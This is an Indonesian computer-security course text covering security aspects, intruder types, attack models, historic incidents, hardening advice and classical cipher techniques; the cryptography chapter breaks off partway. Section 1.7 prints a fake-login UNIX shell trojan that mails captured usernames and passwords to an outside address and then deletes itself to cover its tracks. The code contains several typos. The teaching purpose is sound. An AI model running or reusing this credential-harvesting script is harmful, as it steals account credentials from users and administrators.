Anda di halaman 1dari 129

BAB 1

PENDAHULUAN KEAMANAN KOMPUTER

1.1. Pendahuluan

• “information-based society”, menyebabkan nilai informasi


menjadi sangat penting dan menuntut kemampuan untuk
mengakses dan menyediakan informasi secara cepat dan akurat
menjadi sangat esensial bagi sebuah organisasi,

• Infrastruktur Jaringan komputer, seperti LAN dan Internet,


memungkinkan untuk menyediakan informasi secara cepat,
sekaligus membuka potensi adanya lubang keamanan (security
hole)

Tujuan :

• Memahami konsep dasar keamanan komputer


• Memahami kompleksitas keamanan komputer
• Memahami aspek, Lapisan dan celah/lubang keamanan komputer

Kejahatan Komputer semakin meningkat karena :

• Aplikasi bisnis berbasis TI dan jaringan komputer meningkat :


online banking, e-commerce, Electronic data Interchange (EDI).
• Desentralisasi server.
• Transisi dari single vendor ke multi vendor.
• Meningkatnya kemampuan pemakai (user).
• Kesulitan penegak hokum dan belum adanya ketentuan yang
pasti.
• Semakin kompleksnya system yang digunakan, semakin besarnya
source code program yang digunakan.
• Berhubungan dengan internet.

1.2. Klasifikasi kejahatan Komputer :

Level annoying Level Dangerous

Keamanan Komputer 1
Menurut David Icove [John D. Howard, “An Analysis Of Security
Incidents On The Internet 1989 - 1995,” PhD thesis, Engineering and
Public Policy, Carnegie Mellon University, 1997.] berdasarkan lubang
keamanan, keamanan dapat diklasifikasikan menjadi empat, yaitu:

1. Keamanan yang bersifat fisik (physical security): termasuk akses


orang ke gedung, peralatan, dan media yang digunakan. Contoh :
• Wiretapping atau hal-hal yang ber-hubungan dengan akses
ke kabel atau komputer yang digunakan juga dapat
dimasukkan ke dalam kelas ini.
• Denial of service, dilakukan misalnya dengan mematikan
peralatan atau membanjiri saluran komunikasi dengan
pesan-pesan (yang dapat berisi apa saja karena yang diuta -
makan adalah banyaknya jumlah pesan).
• Syn Flood Attack, dimana sistem (host) yang dituju dibanjiri
oleh permintaan sehingga dia menjadi ter-lalu sibuk dan
bahkan dapat berakibat macetnya sistem (hang).

2. Keamanan yang berhubungan dengan orang (personil), Contoh :


• Identifikasi user (username dan password)
• Profil resiko dari orang yang mempunyai akses (pemakai
dan pengelola).

3. Keamanan dari data dan media serta teknik komunikasi


(communications).

4. Keamanan dalam operasi: Adanya prosedur yang digunakan


untuk mengatur dan mengelola sistem keamanan, dan juga ter-
masuk prosedur setelah serangan (post attack recovery).

1.3. Karakteristik Penyusup :

1. The Curious (Si Ingin Tahu) - tipe penyusup ini pada


dasarnya tertarik menemukan jenis sistem dan data yang
anda miliki.
2. The Malicious (Si Perusak) - tipe penyusup ini berusaha
untuk merusak sistem anda, atau merubah web page anda,
atau sebaliknya membuat waktu dan uang anda kembali
pulih.

2 Keamanan Komputer
3. The High-Profile Intruder (Si Profil Tinggi) - tipe
penyusup ini berusaha menggunakan sistem anda untuk
memperoleh popularitas dan ketenaran. Dia mungkin
menggunakan sistem profil tinggi anda untuk
mengiklankan kemampuannya.
4. The Competition (Si Pesaing) - tipe penyusup ini tertarik
pada data yang anda miliki dalam sistem anda. Ia mungkin
seseorang yang beranggapan bahwa anda memiliki
sesuatu yang dapat menguntungkannya secara keuangan
atau sebaliknya.

Istilah bagi penyusup :

1. Mundane;
Tahu mengenai hacking tapi tidak mengetahui metode dan
prosesnya.
2. Lamer (script kiddies);
Mencoba script2 yang pernah di buat oleh aktivis hacking,
tapi tidak paham bagaimana cara membuatnya.
3. Wannabe;
Paham sedikit metode hacking, dan sudah mulai berhasil
menerobos sehingga berfalsafah; HACK IS MY
RELIGION.
4. Larva (newbie);
Hacker pemula, teknik hacking mulai dikuasai dengan
baik, sering bereksperimen.
5. Hacker ;
Aktivitas hacking sebagai profesi.
6. Wizard ;
Hacker yang membuat komunitas pembelajaran di antara
mereka.
7. Guru ;
Master of the master hacker, lebih mengarah ke
penciptaan tools-tools yang powerfull yang salah satunya
dapat menunjang aktivitas hacking, namun lebih jadi tools
pemrograman system yang umum.

Keamanan Komputer 3
1.4. Aspek Keamanan Komputer :

Menurut Garfinkel [Simson Garfinkel, “PGP: Pretty Good Privacy,”


O’Reilly & Associ-ates, Inc., 1995. ]

1.4.1. Privacy / Confidentiality

• Defenisi: menjaga informasi dari orang yang tidak berhak


mengakses.
• Privacy: lebih kearah data-data yang sifatnya privat , Contoh : e -
mail seorang pemakai (user) tidak boleh dibaca oleh
administrator.
• Confidentiality: berhubungan dengan data yang diberikan ke
pihak lain untuk keperluan tertentu dan hanya diperbolehkan
untuk keperluan tertentu tersebut.
• Contoh: data-data yang sifatnya pribadi (seperti nama, tempat
tanggal lahir, social security number, agama, status perkawinan,
penyakit yang pernah diderita, nomor kartu kredit, dan
sebagainya) harus dapat diproteksi dalam penggunaan dan
penyebarannya.
• Bentuk Serangan: usaha penyadapan (dengan program sniffer).
• Usaha-usaha yang dapat dilakukan untuk meningkatkan privacy
dan confidentiality adalah dengan menggunakan teknologi
kriptografi.

1.4.2. Integrity

• Defenisi: informasi tidak boleh diubah tanpa seijin pemilik


informasi.
• Contoh: e-mail di intercept di tengah jalan, diubah isinya,
kemudian diteruskan ke alamat yang dituju.
• Bentuk serangan: Adanya virus, trojan horse, atau pemakai lain
yang mengubah informasi tanpa ijin, “man in the middle attack”
dimana seseorang menempatkan diri di tengah pembicaraan dan
menyamar sebagai orang lain.

4 Keamanan Komputer
1.4.3. Authentication

• Defenisi: metoda untuk menyatakan bahwa informasi betul-betul


asli, atau orang yang mengakses atau memberikan informasi
adalah betul-betul orang yang dimaksud.
• Dukungan :
o Adanya Tools membuktikan keaslian dokumen, dapat
dilakukan dengan teknologi watermarking(untuk
menjaga “intellectual property”, yaitu dengan
menandai dokumen atau hasil karya dengan “tanda
tangan” pembuat ) dan digital signature.
o Access control, yaitu berkaitan dengan pembatasan
orang yang dapat mengakses informasi. User harus
menggunakan password, biometric (ciri-ciri khas
orang), dan sejenisnya.

1.4.4. Availability

• Defenisi: berhubungan dengan ketersediaan informasi ketika


dibutuhkan.
• Contoh hambatan :
o “denial of service attack” (DoS attack), dimana server
dikirimi permintaan (biasanya palsu) yang bertubi-tubi
atau permintaan yang diluar perkiraan sehingga tidak
dapat melayani permintaan lain atau bahkan sampai
down, hang, crash.
o mailbomb, dimana seorang pemakai dikirimi e-mail
bertubi-tubi (katakan ribuan e-mail) dengan ukuran
yang besar sehingga sang pemakai tidak dapat
membuka e-mailnya atau kesulitan mengakses e-
mailnya.

1.4.5. Access Control

• Defenisi: cara pengaturan akses kepada informasi. berhubungan


dengan masalah authentication dan juga privacy
• Metode: menggunakan kombinasi userid/password atau dengan
menggunakan mekanisme lain.

Keamanan Komputer 5
1.4.6. Non-repudiation

• Defenisi: Aspek ini menjaga agar seseorang tidak dapat menyangkal


telah melakukan sebuah transaksi. Dukungan bagi electronic
commerce.

1.5. Security Attack Models

Menurut W. Stallings [William Stallings, “Network and Internetwork


Security,” Prentice Hall, 1995.] serangan (attack) terdiri dari :

• Interruption: Perangkat sistem menjadi rusak atau tidak tersedia.


Serangan ditujukan kepada ketersediaan (availability) dari sistem.
Contoh serangan adalah “denial of service attack”.

• Interception: Pihak yang tidak berwenang berhasil mengakses asset


atau informasi. Contoh dari serangan ini adalah penyadapan
(wiretapping).

• Modification: Pihak yang tidak berwenang tidak saja berhasil


mengakses, akan tetapi dapat juga mengubah (tamper) aset. Contoh
dari serangan ini antara lain adalah mengubah isi dari web site dengan
pesan-pesan yang merugikan pemilik web site.

• Fabrication: Pihak yang tidak berwenang menyisipkan objek palsu


ke dalam sistem. Contoh dari serangan jenis ini adalah memasukkan
pesan-pesan palsu seperti e-mail palsu ke dalam jaringan komputer.

1.6. Security Breach Accident

1996 U.S. Federal Computer Incident Response Capability


(FedCIRC) melaporkan bahwa lebih dari 2500 “insiden” di
system komputer atau jaringan komputer yang disebabkan
oleh gagalnya sistem keamanan atau adanya usaha untuk
membobol sistem keamanan
1996 FBI National Computer Crimes Squad, Washington D.C.,
memperkirakan kejahatan komputer yang terdeteksi kurang
dari 15%, dan hanya 10% dari angka itu yang dilaporkan
6 Keamanan Komputer
1997 Penelitian Deloitte Touch Tohmatsu menunjukkan bahwa
dari 300 perusahaan di Australia, 37% (dua diantara lima)
pernah mengalami masalah keamanan sistem komputernya.
1996 Inggris, NCC Information Security Breaches Survey
menunjukkan bahwa kejahatan komputer menaik 200%
dari tahun 1995 ke 1996. Kerugian rata-rata US $30.000 /
insiden.
1998 FBI melaporkan bahwa kasus persidangan yang
berhubungan dengan kejahatan komputer meroket 950%
dari tahun 1996 ke tahun 1997, dengan penangkapan dari 4
ke 42, dan terbukti (convicted) di pengadilan naik 88% dari
16 ke 30 kasus.
Dan lain-lain. Dapat dilihat di www.cert.org

Contoh akibat dari jebolnya sistem keamanan, antara lain:

1988 Keamanan sistem mail sendmail dieksploitasi oleh Robert


Tapan Morris sehingga melumpuhkan sistem Internet.
Kegiatan ini dapat diklasifikasikan sebagai “denial of
service attack”.
Diperkirakan biaya yang digunakan untuk memperbaiki
dan hal-hal lain yang hilang adalah sekitar $100 juta. Di
tahun 1990 Morris dihukum (convicted) dan hanya didenda
$10.000.
10 Seorang hacker dari Massachusetts berhasil mematikan
Maret sistem telekomunikasi di sebuah airport local (Worcester,
1997 Massachusetts) sehingga mematikan komunikasi di control
tower dan menghalau pesawat yang hendak mendarat.
Dia juga mengacaukan sistem telepon di Rutland,
Massachusetts.
http://www.news.com/News/Item/Textonly/0,25,20278,00.
html?pfv
1990 Kevin Poulsen mengambil alih system komputer
telekomunikasi di Los Angeles untuk memenangkan kuis
di sebuah radio local.
1995 Kevin Mitnick, mencuri 20.000 nomor kartu kredit,
menyalin system operasi DEC secara illegal dan
mengambil alih hubungan telpon di New York dan
California.
1995 Vladimir Levin membobol bank-bank di kawasan
Keamanan Komputer 7
Wallstreet, mengambil uang sebesar $10 juta.
2000 Fabian Clone menjebol situs aetna.co.id dan Jakarta mail
dan membuat directory atas namanya berisi peringatan
terhadap administrator situs tersebut.
2000 Beberapa web site Indonesia sudah dijebol dan daftarnya
(beserta contoh halaman yang sudah dijebol) dapat dilihat
di koleksi <http://www.2600.com>
2000 Wenas, membuat server sebuah ISP di singapura down

1.7. Memahami Hacker Bekerja

Secara umum melalui tahapan-tahapan sebagai berikut :


1. Tahap mencari tahu system komputer sasaran.
2. Tahap penyusupan
3. Tahap penjelajahan
4. Tahap keluar dan menghilangkan jejak.

Contoh kasus Trojan House, memanfaatkan SHELL script UNIX :

Seorang gadis cantik dan genit peserta kuliah UNIX di sebuah


perguruan tinggi memiliki potensi memancing pengelola sistem komputer
(administrator pemegang account root . . . hmmm) yang lengah. Ia
melaporkan bahwa komputer tempat ia melakukan tugas-tugas UNIX
yang diberikan tidak dapat dipergunakan. Sang pengelola sistem
komputer tentu saja dengan gagah perkasa ingin menunjukkan
kekuasaan sebagai administrator UNIX.

"Well, ini soal kecil. Mungkin password kamu ke blokir, biar saya
perbaiki dari tempat kamu", ujar administrator UNIX sombong sambil
duduk disebelah gadis cantik dan genit peserta kuliah tersebut.

Keesokan harinya, terjadilah kekacauan di sistem UNIX karena diduga


terjadi penyusupan oleh hacker termasuk juga hompepage perguruan
tinggi tersebut di-obok-obok, maklum pengelolanya masih sama.
Selanjutnya pihak perguruan tinggi mengeluarkan press release bahwa
homepage mereka dijebol oleh hacker dari Luar Negeri .

Nah sebenarnya apa sih yang terjadi ?

8 Keamanan Komputer
Sederhana, gadis cantik dan genit peserta kuliah UNIX tersebut
menggunakan program kecil my_login dalam bentuk shell script yang
menyerupai layar login dan password sistem UNIX sebagai berikut:

#!/bin/sh
###################################
# Nama program : my_login
# Deskripsi :Program kuda trojan
sederhana
# versi 1.0 Nopember 1999
####################################
COUNTER=0
Cat /etc/issue
While [ "$COUNTER" –ne 2 ]
do
let COUNTER=$COIUNTER+1
echo "login: \c"
read LOGIN
stty echo
echo "password: \c"
read PASSWORD
echo "User $LOGIN : $PASSWORD" | mail
gadis@company.com
stty echo
echo
echo "Login Incorrect"
done
rm $0
kill –9 $PPID

Apabila program ini dijalankan maka akan ditampilkan layar login


seperti layaknya awal penggunaan komputer pdaa sistem UNIX:

Login:
Password:

Lihatlah, Administrator UNIX yang gagah perkasa tadi yang tidak


melihat gadis tersebut menjalankan program ini tentunya tidak sadar

Keamanan Komputer 9
bahwa ini merupakan layar tipuan. Layar login ini tidak terlihat beda
dibanding layar login sesungguhnya.
Seperti pada program login sesungguhnya, sistem komputer akan
meminta pemakai untuk login ke dalam sistem. Setelah diisi password
dan di enter,maka segera timbul pesan

Login:root
Password: ********
Login Incorrect

Tentu saja Administrator UNIX akan kaget bahwa passwordnya ternyata


(seolah-olah) salah. Untuk itu ia segera mengulangi login dan password.
Setelah dua kali ia mencoba login dan tidak berhasil, maka loginnya
dibatalkan dan kembali keluar UNIX.
Perhatikan program di atas baik-baik, sekali pemakai tersebut mencoba
login dan mengisi password pada layar di atas, setelah itu maka otomatis
data login dan password tersebut akan di email ke
mailto:hacker@company.com. Sampai disini maka si gadis lugu dan
genit telah mendapatkan login dan password . . . ia ternyata seorang
hacker !!
Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program
ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan
jejak (masih ingat tahapan hacker yang ditulis di atas ?). Proses ini
dilakukan pada 2 baris terakhir dari program my_login di atas, yaitu

rm $0
kill –9 $PPID

yang artinya akan segera dilakukan proses penghapusan program


my_login dan hapus pula ID dari proses. Dengan demikian hilanglah
program tersebut yang tentunya juga menghilangkan barang bukti.
Ditambah lagi penghapusan terhadap jejak proses di dalam sistem UNIX.
Hilang sudah tanda-tanda bahwa hacker nya ternyata seorang gadis
peserta kuliahnya.

Sukses dari program ini sebenarnya sangat tergantung dari bagaimana


agar aplikasi ini dapat dieksekusi oleh root. Hacker yang baik memang
harus berusaha memancing agar pemilik root menjalankan program ini.
10 Keamanan Komputer
1.8. Prinsip Dasar Perancangan Sistem yang Aman.

1. Mencegah hilangnya data


2. Mencegah masuknya penyusup

1.8.1 Lapisan Keamanan :

1. Lapisan Fisik :

• membatasi akses fisik ke mesin :


o Akses masuk ke ruangan komputer
o penguncian komputer secara hardware
o keamanan BIOS
o keamanan Bootloader
• back-up data :
o pemilihan piranti back-up
o penjadwalan back-up
• mendeteksi gangguan fisik :
• log file : Log pendek atau tidak lengkap, Log yang berisikan
waktu yang aneh, Log dengan permisi atau kepemilikan yang
tidak tepat, Catatan pelayanan reboot atau restart, Log yang
hilang, masukan su atau login dari tempat yang janggal
• mengontrol akses sumber daya.

2. Keamanan lokal

Berkaitan dengan user dan hak-haknya :


• Beri mereka fasilitas minimal yang diperlukan.
• Hati-hati terhadap saat/dari mana mereka login, atau tempat
seharusnya mereka login.
• Pastikan dan hapus rekening mereka ketika mereka tidak lagi
membutuhkan akses.

3. Keamanan Root

• Ketika melakukan perintah yang kompleks, cobalah dalam cara


yang tidak merusak dulu, terutama perintah yang menggunakan
globbing: contoh, anda ingin melakukan "rm foo*.bak", pertama

Keamanan Komputer 11
coba dulu: "ls foo*.bak" dan pastikan anda ingin menghapus file -
file yang anda pikirkan.
• Beberapa orang merasa terbantu ketika melakukan "touch /-i"
pada sistem mereka. Hal ini akan membuat perintah-perintah
seperti : "rm -fr *" menanyakan apakah anda benar-benar ingin
menghapus seluruh file. (Shell anda menguraikan "-i" dulu, dan
memberlakukannya sebagai option -i ke rm).
• Hanya menjadi root ketika melakukan tugas tunggal tertentu. Jika
anda berusaha mengetahui bagaimana melakukan sesuatu,
kembali ke shell pemakai normal hingga anda yakin apa yang
perlu dilakukan oleh root.
• Jalur perintah untuk pemakai root sangat penting. Jalur perintah,
atau variabel lingkungan PATH mendefinisikan lokal yang dicari
shell untuk program. Cobalah dan batasi jalur perintah bagi
pemakai root sedapat mungkin, dan jangan pernah menggunakan
'.', yang berarti 'direktori saat ini', dalam pernyataan PATH anda.
Sebagai tambahan, jangan pernah menaruh direktori yang dapat
ditulis pada jalur pencarian anda, karena hal ini memungkinkan
penyerang memodifikasi atau menaruh file biner dalam jalur
pencarian anda, yang memungkinkan mereka menjadi root ketika
anda menjalankan perintah tersebut.
• Jangan pernah menggunakan seperangkat utilitas rlogin/rsh/rexec
(disebut utilitas r) sebagai root. Mereka menjadi sasaran banyak
serangan, dan sangat berbahaya bila dijalankan sebagai root.
Jangan membuat file .rhosts untuk root.
• File /etc/securetty berisikan daftar terminal-terminal tempat root
dapat login. Secara baku (pada RedHat Linux) diset hanya pada
konsol virtual lokal (vty). Berhati-hatilah saat menambahkan yang
lain ke file ini. Anda seharusnya login dari jarak jauh sebagai
pemakai biasa dan kemudian 'su' jika anda butuh (mudah -
mudahan melalui ssh atau saluran terenkripsi lain), sehingga tidak
perlu untuk login secara langsung sebagai root.
• Selalu perlahan dan berhati-hati ketika menjadi root. Tindakan
anda dapat mempengaruhi banyak hal. Pikir sebelum anda
mengetik!

4. Keamanan File dan system file

• Directory home user tidak boleh mengakses perintah mengubah


system seperti partisi, perubahan device dan lain-lain.
12 Keamanan Komputer
• Lakukan setting limit system file.
• Atur akses dan permission file : read, writa, execute bagi user
maupun group.
• Selalu cek program-program yang tidak dikenal

5. Keamanan Password dan Enkripsi

• Hati-hati terhadap bruto force attack dengan membuat password


yang baik.
• Selalu mengenkripsi file yang dipertukarkan.
• Lakukan pengamanan pada level tampilan, seperti screen saver.

6. Keamanan Kernel

• Selalu update kernel system operasi.


• Ikuti review bugs dan kekurang-kekurangan pada system operasi.

7. Keamanan Jaringan

• Waspadai paket sniffer yang sering menyadap port Ethernet.


• Lakukan prosedur untuk mengecek integritas data
• Verifikasi informasi DNS
• Lindungi network file system
• Gunakan firewall untuk barrier antara jaringan privat dengan
jaringan eksternal

Keamanan Komputer 13
BAB 2
KRIPTOGRAFI
2.1 Definisi Kriptografi

Cryptography adalah suatu ilmu ataupun seni mengamankan pesan, dan


dilakukan oleh cryptographer.

Cryptanalysis adalah suatu ilmu dan seni membuka (breaking) ciphertext


dan orang yang melakukannya disebut cryptanalyst.

Tujuan
1. Memahami Apa yang dimaksud dengan kriptografi
2. Mengetahui dan Memahami teknik dasar kriptografi
3. Mengetahui dan Memahami Elemen, Karakteristik kriptografi

2.2 Elemen Kriptografi

Gambar 2.1

2.3 Cryptosystem

Cryptographic system atau cryptosystem adalah suatu fasilitas untuk


mengkonversikan plaintext ke ciphertext dan sebaliknya. Dalam sistem
ini, seperangkat parameter yang menentukan transformasi pencipheran
tertentu disebut suatu set kunci. Proses enkripsi dan dekripsi diatur oleh
satu atau beberapa kunci kriptografi.

1. Kriptografi dapat memenuhi kebutuhan umum suatu transaksi:

• Kerahasiaan (confidentiality) dijamin dengan melakukan


enkripsi (penyandian).
14 Keamanan Komputer
• Keutuhan (integrity) atas data-data pembayaran dilakukan
dengan fungsi hash satu arah.
• Jaminan atas identitas dan keabsahan (authenticity) pihak-
pihak yang melakukan transaksi dilakukan dengan
menggunakan password atau sertifikat digital. Sedangkan
keotentikan data transaksi dapat dilakukan dengan tanda
tangan digital.
• Transaksi dapat dijadikan barang bukti yang tidak bisa
disangkal (non-repudiation) dengan memanfaatkan tanda
tangan digital dan sertifikat digital.

2. Karakteristik cryptosytem yang baik sebagai berikut :

• Keamanan sistem terletak pada kerahasiaan kunci dan bukan pada


kerahasiaan algoritma yang digunakan.
• Cryptosystem yang baik memiliki ruang kunci (keyspace) yang
besar.
• Cryptosystem yang baik akan menghasilkan ciphertext yang
terlihat acak dalam seluruh tes statistik yang dilakukan
terhadapnya.
• Cryptosystem yang baik mampu menahan seluruh serangan yang
telah dikenal sebelumnya

2.4 Macam Cryptosystem

A. Symmetric Cryptosystem
Dalam symmetric cryptosystem ini, kunci yang digunakan untuk
proses enkripsi dan dekripsi pada prinsipnya identik, tetapi satu
buah kunci dapat pula diturunkan dari kunci yang lainnya. Kunci-
kunci ini harus dirahasiakan. Oleh karena itulah sistem ini sering
disebut sebagai secret-key ciphersystem. Jumlah kunci yang
dibutuhkan umumnya adalah :

n C2 = n . (n-1)
--------
2
dengan n menyatakan banyaknya pengguna.
Contoh dari sistem ini adalah Data Encryption Standard (DES),
Blowfish, IDEA.

Keamanan Komputer 15
B. Assymmetric Cryptosystem
Dalam assymmetric cryptosystem ini digunakan dua buah kunci.
Satu kunci yang disebut kunci publik (public key) dapat
dipublikasikan, sedang kunci yang lain yang disebut kunci privat
(private key) harus dirahasiakan. Proses menggunakan sistem ini
dapat diterangkan secara sederhana sebagai berikut : bila A ingin
mengirimkan pesan kepada B, A dapat menyandikan pesannya
dengan menggunakan kunci publik B, dan bila B ingin membaca
surat tersebut, ia perlu mendekripsikan surat itu dengan kunci
privatnya. Dengan demikian kedua belah pihak dapat menjamin
asal surat serta keaslian surat tersebut, karena adanya mekanisme
ini. Contoh sistem ini antara lain RSA Scheme dan Merkle-
Hellman Scheme.

2.5 Protokol Cryptosystem

Cryptographic protocol adalah suatu protokol yang menggunakan


kriptografi. Protokol ini melibatkan sejumlah algoritma kriptografi,
namun secara umum tujuan protokol lebih dari sekedar kerahasiaan.
Pihak-pihak yang berpartisipasi mungkin saja ingin membagi sebagian
rahasianya untuk menghitung sebuah nilai, menghasilkan urutan random,
atau pun menandatangani kontrak secara bersamaan.

Penggunaan kriptografi dalam sebuah protokol terutama ditujukan untuk


mencegah atau pun mendeteksi adanya eavesdropping dan cheating.

2.6 Jenis Penyerangan pada protokol

• Ciphertext-only attack. Dalam penyerangan ini, seorang


cryptanalyst memiliki ciphertext dari sejumlah pesan yang
seluruhnya telah dienkripsi menggunakan algoritma yang sama.
• Known-plaintext attack. Dalam tipe penyerangan ini, cryptanalyst
memiliki akses tidak hanya ke ciphertext sejumlah pesan, namun
ia juga memiliki plaintext pesan-pesan tersebut.
• Chosen-plaintext attack. Pada penyerangan ini, cryptanalyst tidak
hanya memiliki akses atas ciphertext dan plaintext untuk beberapa
pesan, tetapi ia juga dapat memilih plaintext yang dienkripsi.

16 Keamanan Komputer
• Adaptive-chosen-plaintext attack. Penyerangan tipe ini
merupakan suatu kasus khusus chosen-plaintext attack.
Cryptanalyst tidak hanya dapat memilih plaintext yang dienkripsi,
ia pun memiliki kemampuan untuk memodifikasi pilihan
berdasarkan hasil enkripsi sebelumnya. Dalam chosen -plaintext
attack, cryptanalyst mungkin hanya dapat memiliki plaintext
dalam suatu blok besar untuk dienkripsi; dalam adaptive-chosen-
plaintext attack ini ia dapat memilih blok plaintext yang lebih
kecil dan kemudian memilih yang lain berdasarkan hasil yang
pertama, proses ini dapat dilakukannya terus menerus hingga ia
dapat memperoleh seluruh informasi.
• Chosen-ciphertext attack. Pada tipe ini, cryptanalyst dapat
memilih ciphertext yang berbeda untuk didekripsi dan memiliki
akses atas plaintext yang didekripsi.
• Chosen-key attack. Cryptanalyst pada tipe penyerangan ini
memiliki pengetahuan tentang hubungan antara kunci-kunci yang
berbeda.
• Rubber-hose cryptanalysis. Pada tipe penyerangan ini,
cryptanalyst mengancam, memeras, atau bahkan memaksa
seseorang hingga mereka memberikan kuncinya.

2.7 Jenis Penyerangan pada Jalur Komunikasi

• Sniffing: secara harafiah berarti mengendus, tentunya dalam hal


ini yang diendus adalah pesan (baik yang belum ataupun sudah
dienkripsi) dalam suatu saluran komunikasi. Hal ini umum terjadi
pada saluran publik yang tidak aman. Sang pengendus dapat
merekam pembicaraan yang terjadi.
• Replay attack: Jika seseorang bisa merekam pesan-pesan
handshake (persiapan komunikasi), ia mungkin dapat mengulang
pesan-pesan yang telah direkamnya untuk menipu salah satu
pihak.
• Spoofing: Penyerang – misalnya Maman – bisa menyamar
menjadi Anto. Semua orang dibuat percaya bahwa Maman adalah
Anto. Penyerang berusaha meyakinkan pihak-pihak lain bahwa
tak ada salah dengan komunikasi yang dilakukan, padahal
komunikasi itu dilakukan dengan sang penipu/penyerang.
Contohnya jika orang memasukkan PIN ke dalam mesin ATM
palsu – yang benar-benar dibuat seperti ATM asli – tentu sang
Keamanan Komputer 17
penipu bisa mendapatkan PIN-nya dan copy pita magentik kartu
ATM milik sang nasabah. Pihak bank tidak tahu bahwa telah
terjadi kejahatan.
• Man-in-the-middle: Jika spoofing terkadang hanya menipu satu
pihak, maka dalam skenario ini, saat Anto hendak berkomunikasi
dengan Badu, Maman di mata Anto seolah-olah adalah Badu, dan
Maman dapat pula menipu Badu sehingga Maman seolah-olah
adalah Anto. Maman dapat berkuasa penuh atas jalur komunikas
ini, dan bisa membuat berita fitnah.

2.8. Metode Kriptografi

1. Metode Kuno

a. 475 S.M.
Bangsa Sparta, suatu bangsa militer pada jaman Yunani
kuno, menggunakan teknik kriptografi yang disebut
scytale, untuk kepentingan perang. Scytale terbuat dari
tongkat dengan papyrus yang mengelilinginya secara
spiral. Kunci dari scytale adalah diameter tongkat yang
digunakan oleh pengirim harus sama dengan diameter
tongkat yang dimiliki oleh penerima pesan, sehingga
pesan yang disembunyikan dalam papyrus dapat dibaca
dan dimengerti oleh penerima.

Gambar 2.2

18 Keamanan Komputer
b. Julius Caesar,
Seorang kaisar terkenal Romawi yang menaklukkan
banyak bangsa di Eropa dan Timur Tengah juga
menggunakan suatu teknik kriptografi yang sekarang
disebut Caesar cipher untuk berkorespondensi sekitar
tahun 60 S.M. Teknik yang digunakan oleh Sang Caesar
adalah mensubstitusikan alfabet secara beraturan, yaitu
oleh alfabet ketiga yang mengikutinya, misalnya, alf abet
‘’A" digantikan oleh "D", "B" oleh "E", dan seterusnya.
Sebagai contoh, suatu pesan berikut :

Gambar 2.3. Caesar Cipher

Dengan aturan yang dibuat oleh Julius Caesar tersebut,


pesan sebenarnya adalah "Penjarakan panglima divisi ke
tujuh segera".

2. Teknik Dasar Kriptografi

a. Substitusi

Salah satu contoh teknik ini adalah Caesar cipher


yang telah dicontohkan diatas. Langkah pertama adalah
membuat suatu tabel substitusi. Tabel substitusi dapat
dibuat sesuka hati, dengan catatan bahwa penerima pesan
memiliki tabel yang sama untuk keperluan dekripsi. Bila
tabel substitusi dibuat secara acak, akan semakin sulit
pemecahan ciphertext oleh orang yang tidak berhak.

Keamanan Komputer 19
A-B-C-D-E-F-G-H-I-J-K-L-M-N-O-P-Q-R-S-T-U-V-W-X-Y-Z-1-2-3-4-5-6-7-8-9-0-.-,
B-F-1-K-Q-G-A-T-P-J-6-H-Y-D-2-X-5-M-V-7-C-8-4-I-9-N-R-E-U-3-L-S-W-,-.-O-Z-0

Gambar 2.3. Tabel Substitusi

Tabel substitusi diatas dibuat secara acak. Dengan


menggunakan tabel tersebut, dari plaintext "5 teknik dasar
kriptografi" dihasilkan ciphertext "L 7Q6DP6 KBVBM
6MPX72AMBGP". Dengan menggunakan tabel substitusi
yang sama secara dengan arah yang terbalik (reverse),
plaintext dapat diperoleh kembali dari ciphertext-nya.

b. Blocking

Sistem enkripsi terkadang membagi plaintext


menjadi blok-blok yang terdiri dari beberapa karakter
yang kemudian dienkripsikan secara independen. Plaintext
yang dienkripsikan dengan menggunakan teknik blocking
adalah :
BLOK 1
BLOK 2
BLOK 3
BLOK 4
BLOK 5
BLOK 6
BLOK 7

Gambar 2.4. Enkripsi dengan Blocking

Dengan menggunakan enkripsi blocking dipilih


jumlah lajur dan kolom untuk penulisan pesan. Jumlah
lajur atau kolom menjadi kunci bagi kriptografi dengan
teknik ini. Plaintext dituliskan secara vertikal ke bawah
berurutan pada lajur, dan dilanjutkan pada kolom
berikutnya sampai seluruhnya tertulis. Ciphertext-nya
adalah hasil pembacaan plaintext secara horizontal
berurutan sesuai dengan blok-nya. Jadi ciphertext yang
dihasilkan dengan teknik ini adalah "5K G
KRTDRAEAIFKSPINAT IRO". Plaintext dapat pula

20 Keamanan Komputer
ditulis secara horizontal dan ciphertextnya adalah hasil
pembacaan secara vertikal.

c. Permutasi

Salah satu teknik enkripsi yang terpenting adalah


permutasi atau sering juga disebut transposisi. Teknik ini
memindahkan atau merotasikan karakter dengan aturan
tertentu. Prinsipnya adalah berlawanan dengan teknik
substitusi. Dalam teknik substitusi, karakter berada pada
posisi yang tetap tapi identitasnya yang diacak. Pada
teknik permutasi, identitas karakternya tetap, namun
posisinya yang diacak. Sebelum dilakukan permutasi,
umumnya plaintext terlebih dahulu dibagi menjadi blok -
blok dengan panjang yang sama.
Untuk contoh diatas, plaintext akan dibagi menjadi blok-
blok yang terdiri dari 6 karakter, dengan aturan permutasi
sebagai berikut :

Gambar 2.5. Permutasi

Dengan menggunakan aturan diatas, maka proses enkripsi


dengan permutasi dari plaintext adalah sebagai berikut :

Keamanan Komputer 21
Gambar 2.6. Proses Enkripsi dengan Permutasi

Ciphertext yang dihasilkan dengan teknik permutasi ini


adalah "N ETK5 SKD AIIRK RAATGORP FI".

d. Ekspansi

Suatu metode sederhana untuk mengacak pesan


adalah dengan memelarkan pesan itu dengan aturan
tertentu. Salah satu contoh penggunaan teknik ini adalah
dengan meletakkan huruf konsonan atau bilangan ganjil
yang menjadi awal dari suatu kata di akhir kata itu dan
menambahkan akhiran "an". Bila suatu kata dimulai
dengan huruf vokal atau bilangan genap, ditambahkan
akhiran "i". Proses enkripsi dengan cara ekspansi terhadap
plaintext terjadi sebagai berikut :

Gambar 2.7. Enkripsi dengan Ekspansi

22 Keamanan Komputer
Ciphertextnya adalah "5AN EKNIKTAN ASARDAN
RIPTOGRAFIKAN". Aturan ekspansi dapat dibuat lebih
kompleks. Terkadang teknik ekspansi digabungkan
dengan teknik lainnya, karena teknik ini bila berdiri
sendiri terlalu mudah untuk dipecahkan.

e. Pemampatan (Compaction)

Mengurangi panjang pesan atau jumlah bloknya


adalah cara lain untuk menyembunyikan isi pesan. Contoh
sederhana ini menggunakan cara menghilangkan setiap
karakter ke-tiga secara berurutan. Karakter-karakter yang
dihilangkan disatukan kembali dan disusulkan sebagai
"lampiran" dari pesan utama, dengan diawali oleh suatu
